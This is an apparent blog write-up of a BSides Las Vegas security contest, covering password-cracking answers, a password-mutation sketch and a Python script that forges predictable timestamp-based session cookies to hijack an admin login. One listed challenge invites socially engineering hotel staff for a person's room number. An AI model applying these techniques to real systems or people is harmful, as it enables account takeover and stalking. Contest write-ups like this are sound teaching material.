Crack It: Such Admin, Very Weak (20 points)

Time | First? | Completed by
n/a | n/a | 0 people

I later spoke with Zack (after solving Babytown Frolics) and he told me he’d hoped that someone would get this with a decent wordlist and mutation engine. The password was “Summer14!” which, honestly, I’m a little disappointed JTR didn’t find for me. :(
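As Zack suspected, even a tiny mutation engine gets there: capitalize a base word, append a two-digit year, and tack on a symbol. A toy sketch (Python 3; the word list and rules here are mine, purely for illustration):

```python
from itertools import product

def mutations(words, years=range(10, 20), symbols='!@#$'):
    # Toy rule set: Capitalized word + two-digit year + trailing symbol,
    # the classic "policy-compliant" password shape.
    for word, year, sym in product(words, years, symbols):
        yield '%s%02d%s' % (word.capitalize(), year, sym)

candidates = set(mutations(['summer', 'winter', 'vegas']))
print(len(candidates), 'Summer14!' in candidates)  # 120 True
```

With a real wordlist and a richer rule set (as in JTR or hashcat rules files), this shape of password falls quickly.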

The hash was a salted-SHA-512 hash, 5000 rounds:

Python 2.7.5 (default, Mar  9 2014, 22:15:05)
[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.0.68)] on darwin
Type "help", "copyright", "credits" or "license" for more information.

>>> from passlib.hash import sha512_crypt
>>> sha512_crypt.encrypt('Summer14!', salt='DwjR36pA', rounds=5000)


Hack It: Babytown Frolics (50 points)

Time | First? | Completed by
n/a | n/a | 2 people
Discover the key at

This challenge presented the user with a simple name and password form, and nothing else.

So many of the answers in this contest included references to the TV show Archer that I finally broke down and watched it. It’s a helluva show. About halfway through the first episode, Archer breaks into a mainframe using the password “guest” and, amazed at how easy it is, exclaims “Babytown frolics!” I just about jumped off the couch, shouting “AHA!” After the show was done, I ran downstairs and figured this out in about 15 minutes (though I needed Zack to “prime the contest,” as it were, and some time to build a functional script…).

Entering “guest” as both userid and password, the player is presented with a screen like this:

No Flag For You

If you click on the “latest user logs” you get a time-stamped list of logins. When I was working on this, the program had been reset, so I needed Zack to log in as admin once. At that point, the history looked like this:

Login History

Looking at the cookies for the page, I see a single session ID cookie:

$ echo 'MTQwNzkwMDUzMTMyTk9UVEhFS0VZ' | base64 -D
140790053132NOTTHEKEY

That’s “not the key,” as it clearly says, but it’s damned close. The first 10 digits of the cookie represent the UNIX timestamp for when the cookie was created (when the user logged in), then there’s a (seemingly random) 2-digit number, and then the string “NOTTHEKEY”.

So if I build a script like this:

import sys, time, calendar, base64, urllib2

# Usage: python doit.py "Aug 13 03:06:42 2014"
target_date = sys.argv[1]

# Convert the admin's last-login time (from the log page) to a UNIX timestamp
stamp = calendar.timegm(time.strptime(target_date, '%b %d %I:%M:%S %Y'))

# Brute-force the (seemingly random) two-digit field in the middle of the cookie
for x in range(0, 100):
    cookie_str = '%d%dNOTTHEKEY' % (stamp, x)
    cookie = base64.b64encode(cookie_str)

    opener = urllib2.build_opener()
    opener.addheaders.append(('Cookie', 'sid=%s' % cookie))
    url = ''  # challenge URL (elided)
    resp = opener.open(url)
    print resp.read()
    print x

and call it like this:

python doit.py "Aug 13 03:06:42 2014"

(where the timestamp was the last time Admin logged in), then I get an output like this:

$ python doit.py "Aug 13 03:06:42 2014"
<head><title>Quite the application</title></head><body><h1>Welcome, my admin from another mother!</h1><br />
<h2>Your flag is: "I couldn't have done it without Morris Day and Jerome."</h2><br />
<a href="/log">See the latest user logs</a>
<a href="/logout">Logout</a>

On the fourth attempt, I was able to match the admin’s session cookie, reload the page with his permissions, and see the flag. Simple session hijacking and privilege escalation. Very nice.

Do It: Wheels on The Bus (30 points)

Time | First? | Completed by
n/a | n/a | 0 people
Start a sing along of "wheels on the bus", "99 bottles of beer on the wall", or even more creative (i.e. I am woman hear me roar) sing along on the bsides shuttle and video it!

Do It: ALL THE THINGS! (50 points)

Time | First? | Completed by
n/a | n/a | 0 people
Attend a talk in Common Ground, Breaking Ground,  Proving Ground, and and a PasswordCon Track and the After Party and get a photo with a speaker from each (after their talk in the talk room) and one of the party DJs (during the party)

Misc: Special Delivery (30 points)

Time | First? | Completed by
n/a | n/a | 1 person
Find out and submit @SecBarbie's room number at the Tuscany. Social Engineering of Hotel Staff is a possibility.

Crack It: NyanNyan! (40 points)

Time | First? | Completed by
n/a | n/a | 0 people
NTLM E6E813370ACB92129BDA449EE25E0FA4

After speaking with Zack, it seems this (and “Don’t Eat That!”) were both pretty difficult NTLM hashes. But since Passwords Con was running in the same space as BSides, he figured there’d be at least a couple of people able to throw some real cracking gear against these hashes. I guess nobody tried. :(

As with the other two passwords I didn’t crack, Zack shared the answer with me so I could put it here: “$R4nd0m9!”.

$ python
Python 2.7.5 (default, Mar  9 2014, 22:15:05) 
[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.0.68)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib, binascii
>>> hash = hashlib.new('md4', '$R4nd0m9!'.encode('utf-16le')).digest()
>>> binascii.b2a_hex(hash).upper()
'E6E813370ACB92129BDA449EE25E0FA4'

Overall Score

My final bingo scoreboard looked like this:

My Final BSidesLV Puzzle Board

All My Scores

Time | Challenge Name | First? | Points | Cumulative
8:18 | Challenge Accepted | No | 10 | 10
8:21 | House Party | No | 50 | 60
9:00 | Easy Peasy | No | 10 | 70
9:01 | Knock Three Times If You’re There | Yes | 38 | 108
9:14 | $0.02 | No | 20 | 128
10:01 | LAme MAN… | No | 30 | 158
10:08 | Not Quite, Julius | Yes | 13 | 171
10:40 | WOPR with Chese | Yes | 25 | 196
10:51 | Under the Door | Yes | 50 | 246
11:39 | Our Bug Bounty Program | No | 10 | 256
1:45 | This Concludes your Evaluation | No | 30 | 286
2:01 | Potent Potables | Yes | 25 | 311
3:56 | You Can’t Ignore This | No | 20 | 331
3:56 | BINGO | Yes | 150 | 481
6:18 | Short Challenge | No | 40 | 521
6:18 | BINGO | Yes | 150 | 671
11:59 | One More Time | (Yes) | (63) | (734)

And, yes, I won. Thanks so much to Urbane Security for sponsoring the contest, and to Zack Fasel for putting it together and running it. This was one of the best contests I’ve played in a while: not only challenging, but also exciting (and a bit stressful, as I worried that someone might snipe me with last-second solutions and best me…). Though that also kind of added to the excitement.

Congratulations also to Sibios (248 points), Spiral Suitcase (228 points), R4V5 (196 points) and Shadghost (130 points), rounding out the top 5, of the 23 who played.